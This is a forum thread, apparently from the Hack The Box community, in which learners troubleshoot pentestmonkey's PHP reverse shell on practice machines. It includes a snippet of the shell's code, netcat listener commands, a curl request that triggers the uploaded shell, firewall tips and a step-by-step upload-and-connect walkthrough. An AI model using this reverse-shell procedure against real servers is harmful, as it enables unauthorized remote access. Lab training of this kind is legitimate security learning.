php-reverse-shell.php issue

Hi all, I’m trying to run a reverse shell from one of the machines. After uploading php-reverse-shell.php to the target, I’m getting an error message ‘Failed to daemonize’ What do I need to do in order to fix this and gain the reverse shell?

Thanks

Pilgrim23

It’s probably just because it doesn’t find pcntl_fork. Your error message also probably says “this is not fatal” meaning it should work even if it can’t daemonize so your problem is likely elsewhere.

I had this same issue. It means your pc isn’t listening on the port.

You want to issue this command on your machine

nc -lnvp ‘whatever port you set in reverse shell’

e.g. nc -lnvp 1234

Hmm, I typed nc -lvp 1234 and that didn’t work. Configured the reverse shell php script with the correct IP address too (ie the IP of the Kali Linux box).

Hmmm not too sure then. If the IP and port are correct, pointing back to you HTB vpn IP it should work.

Type your comment> @Phase said:

I had this same issue. It means your pc isn’t listening on the port.

You want to issue this command on your machine

nc -lnvp ‘whatever port you set in reverse shell’

e.g. nc -lnvp 1234

That’s not what it means. Assuming you’re using the most common script…

// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies.  Worth a try...
if (function_exists('pcntl_fork')) {
	// Fork and have the parent process exit
	$pid = pcntl_fork();
	
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	
	if ($pid) {
		exit(0);  // Parent exits
	}
	// Make the current process a session leader
	// Will only succeed if we forked
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}
	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

Additionally from the Pentestmonkey website…

“Isn’t the shell connection just going to be severed when the web server times out the PHP script?
No. It doesn’t seem to on the systems that I’ve tested it on (Gentoo Linux only so far). Additionally the PHP script attempts to daemonise itself and dissociate from the parent process to avoid this (though it rarely works in practise). Your browser will appear to hang when you access the reverse shell. This is normal. It’s OK to hit cancel in your browser once you’ve got your shell.”

But the shell doesn’t appear.

I have this exact problem, its with a retired machine-I even then followed along with the write-up. They were doing exactly what I was doing. Need to fix whatever my problem is, this is very important to me.

figured out what i was doing, using kali to server the php page i was wget’n only an error message. so that was all i saw. lol. it was a learning moment.

Type your comment

Late to the party, but I’m running into this exact same issue and unfortunately I don’t think anyone explained how they resolved the issue in the comments above. Would someone care to please help me out?

Was also running into this. Check your firewall settings and make sure your kali box is able to accept the port you are using in the php file.

if using ufw you can run this command:

ufw allow from 10.10.10.28 proto tcp to any port 1234

replace the ip and port based on your use case

@Blackxbeard said:
Was also running into this. Check your firewall settings and make sure your kali box is able to accept the port you are using in the php file.

if using ufw you can run this command:

ufw allow from 10.10.10.28 proto tcp to any port 1234

replace the ip and port based on your use case

Did this (changed “port 1234” to “port 80” since I think that’s the one I need), but alas, no luck.

For reference, here is the error message I get:

curl http://10.10.10.28/uploads/php-reverse-shell.php
WARNING: Failed to daemonise. This is quite common and not fatal.
Successfully opened reverse shell to 10.10.10.28:80
ERROR: Shell connection terminated

Have you tried generating a PHP reverse shell with msfvenom instead? That works too.
Not sure which this box is, but I got the same error when I used pentestmonkey’s reverse shell found in /usr/share/webshells/php/. This was for a Windows box.

WARNING: Failed to daemonise. This is quite common and not fatal.
Successfully opened reverse shell to 10.10.10.28:80
ERROR: Shell connection terminated

@ivanitlearning said:
Have you tried generating a PHP reverse shell with msfvenom instead? That works too.
Not sure which this box is, but I got the same error when I used pentestmonkey’s reverse shell found in /usr/share/webshells/php/. This was for a Windows box.

WARNING: Failed to daemonise. This is quite common and not fatal.
Successfully opened reverse shell to 10.10.10.28:80
ERROR: Shell connection terminated

No luck there either. Every exploit I tried, nothing happened and then when I exited it would say “exploit successful. No session created”

Hello Everyone,

I got the same problems I tried to go through everything and I made it in the end :smiley: , so this will help you troubelshoot the issue and try everything :

  1. Before uploading php-reverse-shell.php to the targe, first of all modify the IP address and put the one that was assigned to you through your connection to the Hackthebox network it start with 10.10.14. and you can find it using either “ifconfig” or "ip a " command. About the port number you can change the port or leave it as it is, i.e. “1234”, but for best practice let’s change it and to “33456” instead

  2. Now you modified the file, you uploaded to the web server and you got that message on the web broser that your file is uploaded. CONGRATS !! here’s the critical part :

  3. first of all run the nc command “nc -lvnp 33456” and before run it check that the firewall is disabled using the command “ufw status”

  4. Now you’re listening on the port 33456 and you’re waiting for the machine to reverse connect you , you invoke the event by running the curl command (make sure that your filename is right)

  5. normally in this case you should see on the terminal where you executed the “nc” command that you get a little $ to run your command and that the connection is established

There’s something I still not understand, i.e. : if I stay inactive in the connection I established the connection on the port closes (which is normal) but when I try to execute the curl command I got a 404 which specify that the file is removed so I need to go through the process again and upload the file and… , I think that when the php script is terminated it deletes itself automatically which is a good cybersecurity best practice to not leave a print in the attacked machine.

Best Regards,
Salah,

Check whether you are entering the correct IP address it must be the tun0 interface and try listening via nc -lvvp 1234

@SalahEo said:
There’s something I still not understand, i.e. : if I stay inactive in the connection I established the connection on the port closes (which is normal) but when I try to execute the curl command I got a 404 which specify that the file is removed so I need to go through the process again and upload the file and… , I think that when the php script is terminated it deletes itself automatically which is a good cybersecurity best practice to not leave a print in the attacked machine.

Tip for your next machines: when uploading files that keep getting deleted, if you’re using Burp Proxy you can send the upload request from Proxy > HTTP history to Repeater and resend it to upload the same file again without modifying any cookies or data.

Sorry, I never explained the mistake I was making. It is embarrassing, but it may help someone. Keep in mind I was a total noob, I mean my noobness was extreme, not as bad now… But to the problem I was making for myself… How are you getting your shell to your box? Are you serving it? Like does that server speak php? If so you are only going to upload error messages-- not a shell. So turn apache2 off on your haxor box, and use

python3 -m http.server port
sudo python3 -m http.server low port

I hope this helps someone, it was my first real big problem and was very discouraging.
I apologize for stealing that moment when you figured out your problem if that is indeed what just happened.

Just in case anyone else is facing the same problem, point the reverse shell to your HTB IP address located at the tun0 interface and not your WIFI interface.